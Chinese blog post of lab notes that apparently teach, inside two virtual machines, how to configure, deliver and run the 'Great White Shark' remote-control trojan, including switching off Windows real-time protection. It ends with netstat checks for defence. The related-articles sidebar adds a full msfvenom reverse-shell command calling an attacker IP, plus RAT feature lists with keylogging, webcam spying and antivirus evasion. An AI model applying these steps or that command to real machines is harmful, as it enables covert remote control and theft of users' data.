大白鲨生成Windows木马(仅供参考不可实践)

最新推荐文章于 2024-05-17 17:33:46 发布
最新推荐文章于 2024-05-17 17:33:46 发布
阅读量661 收藏 9
点赞数 8
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207482/article/details/135141581
版权
本文探讨了学习技术的关键方法,包括理解技术本质、结合生活实践和不怕困难的学习态度。此外,详细介绍了计算机木马的植入原理和攻击实验,以及如何防范木马以保护网络安全。
摘要由CSDN通过智能技术生成

一、学习方法

一个正确的学习方法往往比学习更为重要

方法一:学习技术的本质性作用 (第一性定律)

— 帮助我们解决的问题是什么

— 产生的原因/价值

方法二:在工作中到底如何使用?

方法三:技术是由人发明出来的,人的灵感来源于生活,所有的技术都能跟生活结合在一起

方法四:不要怕难,没有学不会的技术点,只有你不愿意学习的技术点

方法五:操作是没有标准答案的,所有的选择都是根据特定场景判断的

 

二、计算机木马

1、概述

木马程序也可以称之为后门程序,具有欺骗性质,导致受害者信息泄露,窃取文件,篡改数据信息。木马伪装依附在游戏、视频、图片.......,诱使用户打开激活木马。

2、木马的植入原理

 

fdc449f8bb66087c85e3093a01a68658.png

##################### 实验三(实现木马攻击实验) #####################

1、准备工作

① 准备两台Windows10的虚拟机,分别命名为攻击机、靶机

② 两台虚拟机之间的网络联通

 

 

2、在攻击机、靶机中安装压缩解压工具

① 将压缩软件拖拽到虚拟机中

② 双击安装包,进行安装(默认路径——选择install——选择Close)

注意:安装完在桌面上找不到,去开始菜单中找即可

③ 安装完后,需要对7z进行配置(工具——选项——选择需要压缩解压的文件类型)

 

cb2b538290a6e76b39a8d6dc8894b4b4.png

3、关闭实时保护(防止大白鲨被灭掉)

右击桌面空白处——选择个性化——主页(进入Windows 设置)

更新和安全——WIndows安全中心——病毒和威胁防护——管理设置——关闭实时保护

 

34d44b3e5a7bfba77f48205b24e92e7e.png

4、配置木马

① 解压大白鲨木马,双击点开程序,进入大白鲨

注意:确保下方只显示蓝色字体,如果有红色字体需要马上解决,以下是正确显示

 

e58907eb431fa9378bc5404f200ab3a5.png

② 创建木马

配置程序——写黑客端的IP地址——选择不安装直接运行——生成服务端

注意:将生成的大白鲨木马直接保存到桌面上即可

 

d988526b6b97d59c55387dad5f2d61c8.png

5、传播木马

将攻击机上创建的大白鲨压缩,以压缩包的形式复制,粘贴到靶机中

 

6084b9d5a763c6b0ea2362db4835f861.png

6、启动木马(在靶机中进行操作)

① 关闭掉靶机上的实时保护,防止大白鲨木马被灭掉

② 解压大白鲨木马

③ 右击大白鲨——选择属性——兼容性——选择兼容Win7系统

 

38ffaf39b1053065e5fb2b490d9aa6c1.png

④ 双击运行大白鲨即可

注意:会听到“有主机上线请注意”,同时在攻击机上看到有靶机上线,如下图所示

 

71ede750d87358359c9cb8463fb652e1.png

7、实现远程控制

三、如何防范计算机木马

##################### 实验四(课外补充,可以自己研究一下) ###################

Win+R——cmd——调用出命令界面

1、运行netstat -nao //查看可以建立的连接

但以上操作只能查看对方设备连接的IP地址信息,无法查看连接的程序

2、运行netstat -anb //查看可以建立的连接以及对方使用的程序

 

546e8a877ad964c9db8055837d59bc74.png

 

10a9112bd8e144bf5aafd13017c9d9dd.png

 

Lyx-0607
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
计算机木马
weixin_44520274的博客
01-29 1618
木马 1.计算机木马(Computer Trojan Horse) 指具有欺骗、盗取受害者计算机敏感信息以及恶意操控等危害的程序 木马程序一般隐藏在图片、小游戏、视频等文件中 2.木马植入过程 过程: 1.配置木马 木马伪装、信息反馈 2.传播木马 软件下载、邮件附件、淫秽图片等 3.启动木马 自动启动、潜伏待命 4.建立连接 主动、被动连接 5.远程控制 3.木马程序演示 配置“大白鲨”...
大白鲨远控1.5共享版
06-08
大白鲨远控1.5共享版是专业超级远程控制。超强的管理功能,适用于电脑爱好者、家庭、学校、公司、单位远程管理计算机! ----------------
大白鲨2010远程控制
04-14
大白鲨2010远程控制 大白鲨2010远程控制 大白鲨2010远程控制
教你做一个木马病毒
最新发布
weixin_57514792的博客
05-17 1295
教你做一个木马病毒
使用大白鲨进行木马攻击实验并实现爆破目标机账号密码以远程连接
Zeker62的博客
08-06 3015
实验环境建议在虚拟机上运行 科学无罪,所有实验环境都在局域网内进行 实验条件 两个Windows虚拟机 一个安装大白鲨远程控制软件 两个虚拟机开启ftp服务(用于木马文件之间的传输) 大白鲨远程控制软件是一个比较旧的攻击软件 大白鲨远程控制 2010 Bate1(v1.6) 运行平台:Win2K、WinXP、Win03、WinVista、Win07、Win2008 软件简介: 兼容1.4~1.3版本 单一exe,不带DLL文件(无可没配置前114KB,压缩52KB)! 注入进程兼容win7/win8
恶意软件样本行为分析——灰鸽子和大白鲨
weixin_49816179的博客
12-21 1503
进行了灰鸽子木马制作和行为分析,并用相似方法对大白鲨木马也进行了探究。
神奇木马
m0_50865437的博客
10-05 252
神奇木马 1、准备虚拟机win7和win2003 2、将windows7和windows2003ip在同一网段,网络连接放在VMnet1 3、完成上一步测试一下虚拟机的连通性 4、利用注册编辑表打开445端口 5、将hack.iso镜像连到windows2007,将大白鲨解压到windows2007里 6、利用大白鲨制作木马,在配置服务打开 7、生成DBSServer.exe 8、 将NTSCan拖到虚拟机, 使用NTSCan进行扫描 9、在windows7执行net use \192.16
68-68.渗透测试-生成木马获取shell(Windows).mp4
05-10
68-68.渗透测试-生成木马获取shell(Windows).mp4
让所有木马都不起作用的方法(变态)
09-30
木马通常伪装成合法程序,诱导用户下载安装,一旦激活,便能在用户不知情的情况下远程控制计算机,从而窃取敏感信息、进行非法活动,甚至将受害者的电脑变为"肉鸡",即被控制的计算机。 【木马的危害】 1. 数据...
特洛伊木马可生存性研究及攻防实践
03-12
特洛伊木马可生存性研究及攻防实践 攻防实践
一键Windows木马插件 清理工具
09-22
有效防止木马与恶意软件变名藏匿 独创清理技术,清理能力远远高于同类软件 安全稳定 脚本库即时更新,查杀能力与时俱进 随时上网获取支持 自由定制 支持多语言环境 用户自由做主是否清理 外部工具及软件的支持
大白鲨远程控制2010正式版
08-23
大白鲨远程控制2010正式版大白鲨远程控制2010正式版大白鲨远程控制2010正式版大白鲨远程控制2010正式版
大白鲨远控2010正式版
12-16
完美破解 2010大白鲨正式版
大白鲨远控v1.5绿色版
04-30
大白鲨远控v1.5 大白鲨远控v1.5 大白鲨远控v1.5 杀软会提示木马,过360
大白鲨远程控制V1.5
04-20
大白鲨远控1.5 运行平台:Win2K、WinXP、Win03、WinVista、Win07、(Win2008没测试) 软件简介: 单一exe,不带DLL文件! DATA文件夹里面的有两个RAR文件,分配为两个功能完全相同的DATA.FILE: “DATA(注入进程兼容Win7).rar” //该DATA无壳, 没配置前 110KB ,压缩 51KB "DATA(注入进程不兼容Win7).rar" //该DATA无壳, 没配置前 390KB ,压缩 173KB 功能简介: 1.屏幕监控,可以查看对方屏幕以及鼠标监控、键盘监控、强制关闭显示器等。 2.视频监控、可以查看对方视频,含有MSH263,IndeoVideo5.04,IntelIndeo(R)VideoR3.2编码 3.CMD命令:模拟CMD。也就是telnet命令执行 4.文件管理:磁盘空间查看、文件浏览、WinRAR压缩解压(必须有安装WINRAR)、执行文件(以后缀执行/Exe类型执行)、上传、下载、删除、新建(文件/文件夹)... 5.进程管理:进程信息查看。包括进程创建时间,父进程ID等..,可以结束进程。 6.服务管理:服务信息查看。包括服务的PID、启动时间、模块路径、描述。等查看,可以对服务进行基本操作. 7.注册表管理:类似于注册表模拟器,可以删除指定注册表值,键,以及新建等.. 8.窗口管理:可以设置窗口标题、对窗口的其他操作,比如关闭窗口(包括父窗口)或隐藏窗口等... 9.键盘记录:可以查看对方输入了哪个键盘按键。 10.附加功能:分为“信息查看”与“插件管理”。 <1>信息查看:可以看对方系统信息,服务端配置信息,宽带信息需要上传指定插件才能查看! <2>插件管理”能上传插件“比如HTTP代理与宽带密码查看插件”。 11.其他管理:有点类似与恶作剧,有禁止鼠标活动与键盘活动功能==,还有查看剪切板字符串==等功能。 12.批量操作:分为“筛选主机”、“修改配置”、“发送信息”、“其它操作”4个面板! <1>筛选主机:可以筛选你先要进行批量操作的主机,如内存大于512MB,小于2048MB的主机=。 <2>修改配置:可以修改上线信息,如IP、端口或者备注! <3>发送信息:分为发生“窗口信息”和“屏幕字体”两种信息。 <4>其它操作:可以下载URL文件,隐藏打开网页、重启、关机、开启3389端口、更新被控端==功能 __________________________________________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^升级日志^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ UpdateTo1.5 1.31升级到1.4更新了有些多,因此该版本主要是1.4的修正版本!增强稳定性 更新日志: 1.增强稳定性 2.修正控制端与被控端停止视频编码/解码器的时候没释放掉的一些内存 3.其它代码更新... 修复BUG 1.其它远控的被控端会上线到大白鲨这来 2.被控端异常断线探测修正 3.控制端关闭的时候有其他网络的程序连接到大白鲨来可能会导致客服端卡住的bug 不兼容1.31版本之前的 __________________________________________________________________________________________________________ UpdateTo1.4 更新日志: 1.更新网络模块,可同时上线上万主机 2.屏幕模块,添加键盘发送、图片保存、透明区域截取、全屏模式、屏幕缩放模式、组合键发送=;(核心算法为DG大哥的,博客iamgyg.blog.163.com) 3.更新视频模块,支持USB无驱视频,传输速度流畅,添加 IntelIndeo(R)VideoR3.2 和 IndeoVideo5.04 编码 4.服务端添加非正常断线探测; 5.进程模块(添加显示进程创建时间,以及优化代码) 6.服务模块(添加已启动的服务的启动时间查看还有PID,以及优化代码) 7.注册表模块,以及代码优化 8.窗口模块(添加PID与窗口进程所在路径查看) 9.添加主机信息复制, 10.添加判断WIN7系统 11.其它更新 修正BUG 1.文件管理的文件修改时间显示错误。 2.时间久了会可能会出现播放有主机下线声音(实际上没看到主机下线) 3.修复win7系统下注入进程后无法创建线程,导致无法连接网络, 4.修复截取系统登录界面白屏
大白鲨远控
09-04
大白鲨远程控制软件,经典的远程控制软件,功能完整,支持屏幕查看、键盘记录、远程摄像头开启等等一些列功能,功能都经过本人测试。
木马程序的制作
热门推荐
自学编程_youkewang.top
03-08 3万+
0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你的系统,窃取你的隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马的制作. 实验环境:一台Win7SP1和一台WinXPsp3+Backtrack5. 使用工具有:msfpayload+msfencode.   0x01:使用msfpayload windows/mete
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 424
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3121
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msfvenom 生成windows的exe木马
06-02
生成Windows的exe木马,可以使用msfvenom命令,如下所示: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > payload.exe ``` 其中,`windows/meterpreter/reverse_tcp`是使用Meterpreter反向TCP连接的payload。`LHOST`是攻击者的IP地址,`LPORT`是攻击者监听的端口号。`-f exe`指定输出为exe文件,`> payload.exe`将输出重定向到一个名为payload.exe的文件中。 在生成的exe文件中包含了一个Meterpreter shell,可以用于远程控制目标系统。请注意,使用这种工具进行攻击是非法的,仅用于测试和教育目的。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lyx-0607

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值